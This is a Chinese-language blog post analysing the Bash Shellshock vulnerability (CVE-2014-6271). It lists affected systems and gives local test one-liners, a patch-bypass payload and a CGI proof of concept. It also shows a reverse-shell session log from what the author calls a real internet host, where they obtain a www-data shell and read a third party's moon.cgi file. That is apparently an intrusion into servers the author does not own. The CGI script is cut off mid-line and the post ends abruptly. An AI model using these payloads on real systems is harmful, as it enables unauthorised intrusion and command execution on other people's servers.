來源:Mickey@360網絡攻防實驗室
Stephane Schazelas最近發現BASH的一個BUG,問題在於BASH在處理環境變量的時候,這個漏洞影響bash版本1.14 - 4.3,
受影響的發行版本包括:
Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7)
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Debian
本地測試方法:
1
|
env x= '() { :;}; echo vulnerable' bash -c "echo this is a test" |
上面是我在kali上的測試結果
遠程測試方法:
首先用BASH寫一個CGI
root@kali:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</ht
放到/usr/lib/cgi-bin裏,然後用curl訪問
能打印出環境變量了。說明能夠正常訪問了。下面我們來反彈一個SHELL
訪問看結果
後續其他的測試還在進行中。
注:android版本的bash也受影響
參考文檔:
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
實際互聯網測試例子:
root@kali:~# nc -vvlp 8080
listening on [any] 8080 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41997
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),50001(gforge),50002(stats),50003(news),50006(tmp)
$ exit
sent 8, rcvd 161
成功利用一個,這居然是perl腳本,cgi的運行都受到影響。思考:難道是因爲#!這個的意思,啓動。。。啓動。。。^_^
sh-4.1$ head moon.cgi
head moon.cgi
#!/usr/bin/perl
#
# moon.cgi
# Display a Moon image using the skycalc program
# by John Thorstensen and images generated by mp.
#
# Brian Casey
# Imagiware, Inc.
我自己機器的perl cgi沒有利用成功,猜想和web server有關係,哎,還是知識不夠。
老外文章有提到條件:
Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string)
ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
剛剛那個moon.cgi的perl腳本里面估計調用了oepn/exec之類的fork了bash
另外出的補丁,好像也能繞過,參考這裏
https://twitter.com/taviso/status/514887394294652929
利用:
1
|
env lol='() { (nothing)=>\' sh -c "echo date" ; echo “vulnerable" |
老外說的SSH利用,是需要賬號的,更多的是越權,參考
https://about.gitlab.com/2014/09/24/gitlab-shell-and-bash-cve-2014-6271/
老外的SNORT的防護規則
http://www.volexity.com/blog/?p=19
另一個互聯網實際的反彈SHELL例子: